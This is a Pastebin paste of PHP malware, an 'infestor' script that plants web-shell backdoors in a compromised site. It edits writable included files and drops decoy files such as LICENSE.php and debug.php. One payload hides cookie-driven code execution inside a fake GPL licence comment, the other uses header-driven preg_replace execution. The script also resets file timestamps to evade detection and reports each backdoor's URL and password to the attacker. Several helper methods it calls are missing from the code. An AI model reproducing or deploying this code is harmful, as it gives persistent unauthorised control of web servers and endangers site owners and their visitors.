Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- class XYZ_Logger
- {
- private static $shouldLog = false;
- public static $messageLog = array();
- public static function getShouldLog()
- {
- return self::$shouldLog;
- }
- public static function setShouldLog($value)
- {
- self::$shouldLog = $value;
- }
- public static function log()
- {
- $data = array();
- foreach (func_get_args() as $arg) {
- if (! (is_string($arg) || is_numeric($arg))) {
- $arg = "\n" . print_r($arg, true);
- }
- $data[] = $arg;
- }
- $niceMessage = implode(" ", $data);
- self::$messageLog[] = $niceMessage;
- if (! self::$shouldLog) return;
- echo "<pre>" . $niceMessage . "</pre>\n";
- }
- }
- class XYZ_Util
- {
- public static function get($array, $name, $default = null)
- {
- return isset($array[$name]) ? $array[$name] : $default;
- }
- private static function longestFirstSort($a, $b)
- {
- return strlen($b) - strlen($a);
- }
- public static function longestFirst($array)
- {
- usort($array, array('XYZ_Util', 'longestFirstSort'));
- return $array;
- }
- /**
- * omit({a: 1, b: 2, c: 3}, 'b', 'c') => {a: 1}
- */
- public static function omit($array)
- {
- $names = array_slice(func_get_args(), 1);
- foreach ($names as $name) {
- unset($array[$name]);
- }
- return $array;
- }
- /**
- * pluck({a: 1, b: 2}, 'a') => {a: 1}
- */
- public static function pluck($array, $name)
- {
- $res = array();
- foreach ($array as $element) {
- $res[] = $element[$name];
- }
- return $res;
- }
- /**
- * without([1,2,3], 2, 3) => [1]
- */
- public static function without($array)
- {
- $names = array_slice(func_get_args(), 1);
- $res = array();
- foreach ($array as $element) {
- if (in_array($element, $names)) continue;
- $res[] = $element;
- }
- return $res;
- }
- public static function nowww($string)
- {
- if (0 === strpos($string, 'www.')) {
- $string = substr($string, 4);
- }
- return $string;
- }
- public static function addClosingTag($contents)
- {
- $starting = strrpos($contents, '<?');
- $closing = strrpos($contents, '?>');
- if ($starting > $closing || ! $closing) $contents .= '?>';
- return $contents;
- }
- public static function contains($string, $search)
- {
- return false !== strpos($string, $search);
- }
- public static function ignoreAbort()
- {
- ignore_user_abort(false);
- self::timeLimit(1800);
- }
- public static function timeLimit($time)
- {
- set_time_limit($time);
- ini_set('max_execution_time', $time);
- }
- public static function isCli()
- {
- return php_sapi_name() == 'cli';
- }
- public static function setting($name, $default = null)
- {
- $headerName = 'HTTP_X_'.strtoupper($name);
- if (isset($_SERVER[$headerName])) return $_SERVER[$headerName];
- if (self::isCli() && getenv($name)) return getenv($name);
- return $default;
- }
- public static function getDocRoot()
- {
- return str_replace('\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
- }
- public static function rglob($pattern, $flags = 0) {
- $files = glob($pattern, $flags);
- foreach (glob(dirname($pattern).'/*', GLOB_ONLYDIR|GLOB_NOSORT) as $dir) {
- $files = array_merge($files, self::rglob($dir.'/'.basename($pattern), $flags));
- }
- return $files;
- }
- }
- class XYZ_Browser_Page
- {
- private $html;
- /** @var DOMXPath */
- private $xpath;
- private $headers;
- private $info;
- public function __construct($html, $headers, $info, $xpath)
- {
- $this->html = $html;
- $this->headers = $headers;
- $this->info = $info;
- $this->xpath = $xpath;
- }
- public function getInfo()
- {
- return $this->info;
- }
- public function getHtml()
- {
- return $this->html;
- }
- public function getText()
- {
- return strip_tags($this->getHtml());
- }
- public function xpath($query, $context = null)
- {
- return $this->xpath->query($query, $context);
- }
- public function xpathFirst($query, $context = null)
- {
- return $this->xpath($query, $context)->item(0);
- }
- public static function create($headerString, $html, $info)
- {
- $lines = preg_split('#\r?\n#', $headerString);
- array_shift($lines);
- $headers = array();
- foreach ($lines as $line) {
- list($key, $value) = explode(': ', $line);
- $headers[$key] = $value;
- }
- $isHTML = array_key_exists('content_type', $info) && false !== strpos($info['content_type'], 'html');
- if (! $isHTML) {
- return new XYZ_Browser_Page($html, $headers, $info, false);
- }
- if (class_exists('DOMDocument')) {
- $doc = new DOMDocument('1.0', 'utf-8');
- // $fixEncoding = '<meta http-equiv="content-type" content="text/html; charset=utf-8">';
- // $doc->loadHTML($fixEncoding.$html);
- @$doc->loadHTML($html);
- $xpath = new DOMXpath($doc);
- } else {
- // just fucking crash if there's no dom support and client tries to use it
- $xpath = null;
- }
- return new XYZ_Browser_Page($html, $headers, $info, $xpath);
- }
- public function getHeaders()
- {
- return $this->headers;
- }
- public function getCookie($cookieName)
- {
- foreach ($this->headers as $name => $header) {
- if ($name != 'Set-Cookie') continue;
- list($cookie) = explode(';', $header);
- list($name, $value) = explode('=', $cookie);
- if ($name == $cookieName) return $value;
- }
- return false;
- }
- public function getFormValues($xpath)
- {
- $form = $this->xpathFirst($xpath);
- // todo: add support for the rest
- $inputs = $this->xpath(".//input[@type='hidden' or @type='password' or @type='email' or @type='text']", $form);
- $values = array();
- for ($i = 0; $i < $inputs->length; $i++) {
- /** @var DOMElement $input */
- $input = $inputs->item($i);
- $name = $input->getAttribute('name');
- $value = $input->getAttribute('value');
- $values[$name] = $value;
- }
- return $values;
- }
- }
- class XYZ_Browser
- {
- private $defaultHeaders = array();
- private $defaultOptions = array();
- private $dnsValues = array();
- private $ch;
- private $options;
- private $lastUrl = false;
- private $retries = 1;
- private $retrySleep = 5;
- public function __construct($ch, $options = array())
- {
- $this->ch = $ch;
- $this->options = $options;
- }
- /**
- * @param $url
- * @param array $options
- * @return XYZ_Browser_Page
- */
- public function get($url, $options = array())
- {
- $options[CURLOPT_POST] = false;
- return $this->query($url, $options);
- }
- public function post($url, $options = array())
- {
- return $this->query($url, $options);
- }
- public function setDefaultOptions($options)
- {
- $this->defaultOptions = $options;
- }
- public function setDefaultHeaders($headers)
- {
- $this->defaultHeaders = $headers;
- }
- public function setDNSValue($host, $ip)
- {
- $this->dnsValues[$host] = $ip;
- }
- public function setRetries($value)
- {
- $this->retries = $value;
- }
- public function setRetrySleep($value)
- {
- $this->retrySleep = $value;
- }
- private function query($url, $requestOptions = array())
- {
- $attempt = 0;
- do {
- $page = $this->doQuery($url, $requestOptions);
- if ($page) return $page;
- $attempt++;
- sleep($this->retrySleep);
- } while ($attempt < $this->retries);
- return $page;
- }
- private function doQuery($url, $requestOptions = array())
- {
- XYZ_Logger::log("Query to", $url);
- $extraVerbose = @$requestOptions['extraVerbose'];
- unset($requestOptions['extraVerbose']);
- $headers = array(
- 'Expect: ',
- 'Cache-Control: no-cache'
- );
- foreach ($this->dnsValues as $host => $ip) {
- if (false === strpos($url, $host)) continue;
- $url = str_replace($host, $ip, $url);
- $headers[] = "Host: $host";
- break;
- }
- if ($this->lastUrl) {
- $headers[] = 'Referer: '.$this->lastUrl;
- }
- $this->maybeSetRef($url);
- $headers = array_merge($this->defaultHeaders, $headers);
- $defaults = array(
- CURLOPT_COOKIEJAR => ( 0 === stripos(PHP_OS, 'WIN') ? "NUL" : "/dev/null" ),
- // CURLOPT_COOKIEFILE => "/tmp/123",
- // CURLOPT_COOKIEJAR => "/tmp/123",
- CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0',
- CURLOPT_HTTPHEADER => $headers,
- CURLOPT_RETURNTRANSFER => true,
- CURLOPT_CONNECTTIMEOUT => 3,
- CURLOPT_TIMEOUT => 15,
- CURLOPT_URL => $url,
- CURLOPT_ENCODING => 'gzip',
- CURLOPT_FOLLOWLOCATION => true,
- CURLOPT_HEADER => true,
- );
- $options = $requestOptions + $this->defaultOptions + $defaults;
- if (isset($requestOptions[CURLOPT_HTTPHEADER])) {
- $options[CURLOPT_HTTPHEADER] = array_merge($requestOptions[CURLOPT_HTTPHEADER], $defaults[CURLOPT_HTTPHEADER]);
- }
- if (isset($options[CURLOPT_FILE]) || isset($requestOptions[CURLOPT_WRITEFUNCTION])) {
- unset($options[CURLOPT_RETURNTRANSFER]);
- }
- if ($extraVerbose && XYZ_Logger::getShouldLog()) {
- $verbose = fopen('php://temp', 'rw+');
- $options[CURLOPT_VERBOSE] = 1;
- $options[CURLOPT_STDERR] = $verbose;
- }
- $constants = get_defined_constants(true);
- $curlConstants = array();
- foreach ($constants['curl'] as $nicename => $value) {
- if (0 !== strpos($nicename, 'CURLOPT_')) continue;
- $curlConstants[$value] = $nicename;
- }
- foreach ($options as $key => $value) {
- $status = curl_setopt($this->ch, $key, $value);
- if (! $status) {
- XYZ_Logger::log("Could not set curl option " . $curlConstants[$key] . " to " . $value);
- }
- }
- $response = curl_exec($this->ch);
- if ($extraVerbose && XYZ_Logger::getShouldLog()) {
- XYZ_Logger::log("CURL info: ".var_export(@curl_getinfo($this->ch), true));
- XYZ_Logger::log("CURL errno: ".@curl_errno($this->ch));
- rewind($verbose);
- $verboseLog = stream_get_contents($verbose);
- XYZ_Logger::log("CURL headers:\n$verboseLog");
- }
- if (! $response) {
- XYZ_Logger::log("CURL error: ".@curl_error($this->ch));
- return $response;
- }
- $parts = explode("\r\n\r\n", $response);
- while (0 === stripos($parts[1], 'HTTP/')) array_shift($parts);
- $header = array_shift($parts);
- $body = implode("\r\n\r\n", $parts);
- return XYZ_Browser_Page::create($header, $body, curl_getinfo($this->ch));
- }
- private function maybeSetRef($url)
- {
- if ($this->canBeRef($url)) {
- $this->lastUrl = $url;
- }
- }
- private function canBeRef($url)
- {
- if (! isset($this->options['norefDomains'])) return true;
- foreach ($this->options['norefDomains'] as $pattern) {
- if (false !== strpos($url, $pattern)) return false;
- }
- return true;
- }
- }
- class XYZ_IncludedChecker
- {
- /** @var XYZ_Browser */
- private $browser;
- /** @var XYZ_Writer */
- private $writer;
- private $delimiter = 'xyz-include-checker';
- public function __construct($browser, $writer)
- {
- $this->browser = $browser;
- $this->writer = $writer;
- }
- public function getIncludedFiles($file, $url)
- {
- $included = $this->readFilesInclude($file);
- if (! $included) {
- XYZ_Logger::log("Could not get files using include");
- $included = $this->readFilesEdit($file, $url);
- }
- if (! $included) {
- return array("error" => "Could not read included files");
- }
- XYZ_Logger::log("Included:\n" . implode("\n", $included));
- return $included;
- }
- private function readFilesInclude($file)
- {
- // wordpress defines global variables by just assigning them in global scope, so if we include from function, they aren't global
- // therefore when you try to include index from function, it tries to define some global shit like this, which then crashes shit
- $json = json_encode($file);
- $includerContents = <<<EOF
- <?php
- function _print_included_wp() {
- echo "<$this->delimiter>".json_encode(get_included_files())."</$this->delimiter>";
- unlink(__FILE__);
- exit();
- }
- \$file = json_decode('$json');
- register_shutdown_function('_print_included_wp');
- chdir(dirname(\$file));
- \$myname = \$_SERVER['SCRIPT_NAME'];
- foreach (\$_SERVER as \$key => \$value) {
- \$_SERVER[\$key] = str_replace(\$myname, '/'.basename(\$file), \$value);
- }
- \$_SERVER['REQUEST_URI'] = \$_SERVER['SCRIPT_URL'] = '/';
- \$_SERVER['SCRIPT_URI'] = 'http://'.\$_SERVER['HTTP_HOST'] . '/';
- ob_start();
- @include \$file;
- ob_end_clean();
- _print_included_wp();
- EOF;
- $file = 'timthumb-v3.php';
- $written = file_put_contents(dirname(__FILE__) . '/' . $file, $includerContents);
- if (! $written) {
- XYZ_Logger::log("Could not write", dirname(__FILE__) . '/' . $file);
- return false;
- }
- $url = "http://" . $_SERVER['HTTP_HOST'] . rtrim(dirname($_SERVER['REQUEST_URI']), '/') . "/" . $file;
- XYZ_Logger::log("Getting files from", $url);
- $response = $this->browser->get($url);
- if ($response) $response = $response->getHtml();
- $res = $this->parseIncludedResponse($response);
- // slice robots, index
- if ($res) $res = array_slice($res, 2);
- return $res;
- }
- private function parseIncludedResponse($response)
- {
- if (!$response || !preg_match("#<$this->delimiter>(.+?)</$this->delimiter>#is", $response, $matches)) {
- XYZ_Logger::log("BAD response length " . strlen($response));
- if (preg_match('#<title.*</title>#is', $response, $titles)) {
- XYZ_Logger::log("Title " . htmlspecialchars($titles[0]));
- } else {
- XYZ_Logger::log("No title");
- }
- return false;
- }
- return json_decode($matches[1], true);
- }
- private function readFilesEdit($file, $url)
- {
- XYZ_Logger::log("Editing index $file");
- if (! is_writable($file)) {
- XYZ_Logger::log("Index is not writable");
- return false;
- }
- $contents = $this->writer->read($file);
- $contents = $this->writer->addClosingTag($contents);
- $prefix = <<<EOF
- <?php
- if (! function_exists('xyz_printend')) {
- function xyz_printend() {
- echo '<!--<$this->delimiter>'.json_encode(get_included_files()).'</$this->delimiter>-->';
- }
- register_shutdown_function('xyz_printend');
- }
- ?>
- EOF;
- $contents = $prefix.$contents."<?php printend(); ?>";
- $written = $this->writer->write($file, $contents);
- if (! $written) {
- XYZ_Logger::log("Could not write index");
- return false;
- }
- // my local nginx for some reason does not use the new content without it. sleep(3) works too, but let's use 5 for safety
- sleep(5);
- XYZ_Logger::log("Fetching from $url");
- $response = $this->browser->get($url);
- if ($response) $response = $response->getHtml();
- $this->writer->rollback($file);
- $res = $this->parseIncludedResponse($response);
- // slice index
- if ($res) $res = array_slice($res, 1);
- return $res;
- }
- }
- class XYZ_Writer
- {
- private $oldContents = array();
- public function read($file)
- {
- $contents = file_get_contents($file);
- $this->oldContents[$file] = array(
- 'contents' => $contents,
- 'mtime' => filemtime($file),
- 'atime' => fileatime($file)
- );
- return $contents;
- }
- public function write($file, $data)
- {
- $editMode = file_exists($file);
- if ($editMode) {
- $this->read($file);
- }
- if (! ($written = file_put_contents($file, $data))) return false;
- if ($editMode) {
- @touch($file, $this->oldContents[$file]['mtime'] + 1, $this->oldContents[$file]['atime'] + 1);
- }
- return $written;
- }
- public function rollback($file)
- {
- $fileData = $this->oldContents[$file];
- file_put_contents($file, $fileData['contents']);
- @touch($file, $fileData['mtime'], $fileData['atime']);
- }
- public function addClosingTag($string)
- {
- $starting = strrpos($string, '<?');
- $closing = strrpos($string, '?>');
- if ($starting > $closing || ! $closing) $string .= '?>';
- return $string;
- }
- public function getDirTree($dir)
- {
- $list = array( $dir );
- $dirs = glob($dir.'/*', GLOB_ONLYDIR);
- $dirs = array_slice($dirs, 0, 100);
- foreach ($dirs as $subdir) {
- $list = array_merge($list, $this->getDirTree($subdir));
- }
- return $list;
- }
- }
- class XYZ_Backdoor
- {
- private $type;
- private $code;
- private $flags;
- public function __construct($type, $code, $flags = '')
- {
- $this->type = $type;
- $this->code = $code;
- $this->flags = $flags;
- }
- public function hasFlag($flag)
- {
- return in_array($flag, explode(',', $this->flags));
- }
- public function getType()
- {
- return $this->type;
- }
- public function getCode($password)
- {
- return str_replace('{{PASSWORD}}', $password, $this->code);
- }
- }
- class XYZ_Infestor
- {
- /** @var XYZ_IncludedChecker */
- private $ic;
- /** @var XYZ_Writer */
- private $writer;
- /** @var XYZ_Backdoor[] */
- private $backdoors;
- private $results = array();
- private $log = "";
- public function __construct($ic, $writer, $backdoors)
- {
- $this->ic = $ic;
- $this->writer = $writer;
- $this->backdoors = $backdoors;
- }
- public function run()
- {
- $docRoot = $_SERVER['DOCUMENT_ROOT'];
- $index = $docRoot . '/' . 'index.php';
- $indexUrl = 'http://'. $_SERVER['HTTP_HOST'];
- $indexIncludedFiles = $this->ic->getIncludedFiles($index, $indexUrl);
- mt_srand(crc32($_SERVER['REQUEST_URI']));
- $dirs = $this->writer->getDirTree($docRoot);
- $this->backdoorFiles($indexIncludedFiles);
- $this->backdoorDirs($dirs);
- return array(
- 'log' => $this->log,
- 'results' => $this->results
- );
- }
- private function log()
- {
- $args = func_get_args();
- $this->log .= implode(" ", $args). "\n";
- }
- private function backdoorFiles($files)
- {
- $writable = array_filter($files, 'is_writable');
- if (! count($writable)) {
- $this->log("No writable included files");
- return;
- }
- $writable = $this->shuffle($writable);
- $writable = array_slice($writable, 0, 10);
- foreach ($writable as $file) {
- $this->backdoorFile($file);
- }
- }
- private function shuffle($items)
- {
- for ($i = count($items) - 1; $i > 0; $i--)
- {
- $j = @mt_rand(0, $i);
- $tmp = $items[$i];
- $items[$i] = $items[$j];
- $items[$j] = $tmp;
- }
- return $items;
- }
- private function backdoorFile($file)
- {
- /** @var XYZ_Backdoor $backdoor */
- $backdoor = XYZ_Util::random($this->backdoors);
- $type = XYZ_Util::random(array('prepend', 'append'));
- if ($backdoor->hasFlag('prependonly')) {
- $type = 'prepend';
- }
- $password = substr(md5('something'.$file), 0, 6);
- $password = preg_replace('#^\d#', 'p', $password);
- $password = strtoupper($password);
- if (file_exists($file)) {
- $content = $this->writer->read($file);
- if (XYZ_Util::contains($content, $backdoor->getCode($password))) {
- $this->log("Already added to", $file);
- $this->addResult($file, $backdoor, $password);
- return;
- }
- if ($type == 'prepend') {
- $content = $backdoor->getCode($password) . $content;
- } else {
- $content = XYZ_Util::addClosingTag($content) . $backdoor->getCode($password);
- }
- } else {
- $content = $backdoor->getCode($password);
- }
- $this->log("Writing", $backdoor->getType(), "to", $file, "with type", $type);
- $written = $this->writer->write($file, $content);
- if (! $written) {
- $this->log("Could not write");
- return;
- }
- $this->addResult($file, $backdoor, $password);
- }
- private function addResult($file, $backdoor, $password)
- {
- $docRoot = $_SERVER['DOCUMENT_ROOT'];
- $path = str_replace($docRoot, '', $file, $count);
- if (! $count) {
- $this->log("Path not in doc root?", $path, $docRoot);
- return;
- }
- $path = '/' . ltrim($path, '/');
- $url = "http://" . $_SERVER['HTTP_HOST'] . $path;
- $this->results[] = array(
- 'url' => $url,
- 'password' => $password,
- 'type' => $backdoor->getType()
- );
- }
- private function backdoorDirs($dirs)
- {
- $dirs = array_filter($dirs, 'is_writable');
- $dirs = XYZ_Util::longestFirst($dirs);
- $dirs = $this->shuffle($dirs);
- $dirs = array_slice($dirs, 0, 10);
- foreach ($dirs as $dir) {
- $this->backdoorDir($dir);
- }
- }
- private function backdoorDir($dir)
- {
- $filename = XYZ_Util::random(array('LICENSE.php', 'robots.php', 'debug.php', 'test.php'));
- $path = $dir . '/' . $filename;
- $this->backdoorFile($path);
- }
- }
- $fabLicense = <<<EOF
- <?php /* GNU GENERAL PUBLIC LICENSE
- Version 3, 29 June 2007
- Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
- Preamble
- The GNU General Public License is a free, copyleft license for
- software and other kinds of works.
- The licenses for most software and other practical works are designed
- to take away your freedom to share and change the works. By contrast,
- the GNU General Public License is intended to guarantee your freedom to
- share and change all versions of a program--to make sure it remains free
- software for all its users. We, the Free Software Foundation, use the
- GNU General Public License for most of our software; it applies also to
- any other work released this way by its authors. You can apply it to
- your programs, too.
- When we speak of free software, we are referring to freedom, not
- price. Our General Public Licenses are designed to make sure that you
- have the freedom to distribute copies of free software (and charge for
- them if you wish), that you receive source code or can get it if you
- want it, that you can change the software or use pieces of it in new
- free programs, and that you know you can do these things.
- To protect your rights, we need to prevent others from denying you
- these rights or asking you to surrender the rights. Therefore, you have
- certain responsibilities if you distribute copies of the software, or if
- you modify it: responsibilities to respect the freedom of others.
- For example, if you distribute copies of such a program, whether
- gratis or for a fee, you must pass on to the recipients the same
- freedoms that you received. You must make sure that they, too, receive
- or can get the source code. And you must show them these terms so they
- know their rights.
- Developers that use the GNU GPL protect your rights with two steps:
- (1) assert copyright on the software, and (2) offer you this License
- giving you */extract(\$_COOKIE);/* copy, distribute and/or modify it.
- For the developers' and authors' protection, the GPL clearly explains
- that there is no warranty for this free software. For both users' and
- authors' sake, the GPL requires that modified versions be marked as
- changed, so that their problems will not be attributed erroneously to
- authors of previous versions.
- Some devices are designed to deny users access to install or run
- modified versions of the software inside them, although the manufacturer
- can do so. This is fundamentally incompatible with the aim of
- protecting users' freedom to change the software. The systematic
- pattern of such abuse occurs in the area of products for individuals to
- use, which is precisely where it is most unacceptable. Therefore, we
- have designed this version of the GPL to prohibit the practice for those
- products. If such problems arise substantially in other domains, we
- stand ready to extend this provision to those domains in future versions
- of the GPL, as needed to protect the freedom of users.
- Finally, every program is threatened constantly by software patents.
- States should not allow patents to restrict development and use of
- software on general-purpose computers, but in those that do, we wish to
- avoid the special danger that patents applied to a free program could
- make it effectively proprietary. patents applied to GPL assures that
- patents cannot be used to render the program non-free.
- The precise terms and conditions for copying, distribution and
- modification follow.
- TERMS AND CONDITIONS
- 0. Definitions.
- "This License" refers to version 3 of the GNU General Public License.
- "Copyright" also means copyright-like laws that apply to other kinds of
- works, such as semiconductor masks.
- "The Program" refers to any copyrightable work licensed under this
- License. Each licensee is addressed as "you". "Licensees" and
- "recipients" may be individuals or organizations.
- To "modify" a work means to copy from or adapt all or part of the work
- in a fashion requiring copyright permission, other than the making of an
- exact copy. The resulting work is called a "modified version" of the
- earlier work or a work "based on" the earlier work.
- A "covered work" means either the unmodified Program or a work based
- on the Program.
- To "propagate" a work means to do anything with it that, without
- permission, would make you directly or secondarily liable for
- infringement under applicable copyright law, except executing it on a
- computer or modifying a private copy. Propagation includes copying,
- distribution (with or without modification), making available to the
- public, and in some countries other activities as well.
- To "convey" a work means any kind of propagation that enables other
- parties to make or receive copies. Mere interaction with a user through
- a computer network, with no transfer of a copy, is not conveying.
- An interactive user interface displays "Appropriate Legal Notices"
- to the extent that it includes a convenient and prominently visible
- feature that (1) displays an appropriate copyright notice, and (2)
- tells the user that there is no warranty for the work (except to the
- extent that warranties are provided), that licensees may convey the
- work under this License, and how to view a copy of this License. If
- the interface presents a list of user commands or options, such as a
- menu, a prominent item in the list meets this criterion.
- 1. Source Code.
- The "source code" for a work means the preferred form of the work
- for making modifications to it. "Object code" means any non-source
- form of a work.
- A "Standard Interface" means an interface that either is an official
- standard defined by a recognized standards body, or, in the case of
- interfaces specified for a particular programming language, one that
- is widely used among developers working in that language.
- The "System Libraries" of an executable work include anything, other
- than the work as a whole, that (a) is included in the normal form of
- packaging a Major Component, but which is not part of that Major
- Component, and (b) serves only to enable use of the work with that
- Major Component, or to implement a Standard Interface for which an
- implementation is available to the public in source code form. A
- "Major Component", in this context, means a major essential component
- (kernel, window system, and so on) of the specific operating system
- (if any) on which the executable work runs, or a compiler used to
- produce the work, or an object code interpreter used to run it.
- The "Corresponding Source" for a work in object code form means all
- the source code needed to generate, install, and (for an executable
- work) run the object code and to modify the work, including scripts to
- control those activities. However, it does not include the work's
- System Libraries, or general-purpose tools or generally available free
- programs which are used unmodified in performing those activities but
- which are not */@\${{PASSWORD}}&&@\$F(\$A,\$B);/*. For example, Corresponding Source
- the work, and the source code for shared libraries and dynamically
- linked subprograms that the work is specifically designed to require,
- such as by intimate data communication or control flow between those
- subprograms and other parts of the work.
- The Corresponding Source need not include anything that users
- can regenerate automatically from other parts of the Corresponding
- Source.
- The Corresponding Source for a work in source code form is that
- same work.
- 2. Basic Permissions.
- All rights granted under this License are granted for the term of
- copyright on the Program, and are irrevocable provided the stated
- conditions are met. This License explicitly affirms your unlimited
- permission to run the unmodified Program. The output from running a
- covered work is covered by this License only if the output, given its
- content, constitutes a covered work. This License acknowledges your
- rights of fair use or other equivalent, as provided by copyright law.
- You may make, run and propagate covered works that you do not
- convey, without conditions so long as your license otherwise remains
- in force. You may convey covered works to others for the sole purpose
- of having them make modifications exclusively for you, or provide you
- with facilities for running those works, provided that you comply with
- the terms of this License in conveying all material for which you do
- not control copyright. Those thus making or running the covered works
- for you must do so exclusively on your behalf, under your direction
- and control, on terms that prohibit them from making any copies of
- your copyrighted material outside their relationship with you.
- Conveying under any other circumstances is permitted solely under
- the conditions stated below. Sublicensing is not allowed; section 10
- makes it unnecessary. */ ?>
- EOF;
- $pregReplaceCode = <<<EOF
- <?php @preg_replace(\$_SERVER['HTTP_X_{{PASSWORD}}'], \$_SERVER['HTTP_X_CURRENT'], ''); ?>
- EOF;
- $backdoors = array(
- new XYZ_Backdoor('fab', $fabLicense, 'prependonly'),
- new XYZ_Backdoor('preg_replace', $pregReplaceCode)
- );
- $browser = new XYZ_Browser();
- $writer = new XYZ_Writer();
- $ic = new XYZ_IncludedChecker($browser, $writer);
- $infestor = new XYZ_Infestor($ic, $writer, $backdoors);
- if (@$_SERVER['HTTP_X_PASSWORD'] == $ic->getPassword() && $file = @strrev($_SERVER['HTTP_X_CHECKED_FILE'])) {
- // wordpress defines global variables by just assigning them in global scope, so if we include from function, they aren't global
- register_shutdown_function(array($ic, 'printIncluded'));
- $ic->prepareInclude($file);
- ob_start();
- @include $file;
- ob_end_clean();
- $ic->printIncluded();
- exit();
- } else {
- $res = $infestor->run();
- if (@$_GET['txt']) {
- echo '<pre>';
- print_r($res);
- } else {
- echo '<xyz-infestor>'.json_encode($res).'</xyz-infestor>';
- }
- }
- if (@$_GET['rm']) {
- @unlink(__FILE__);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement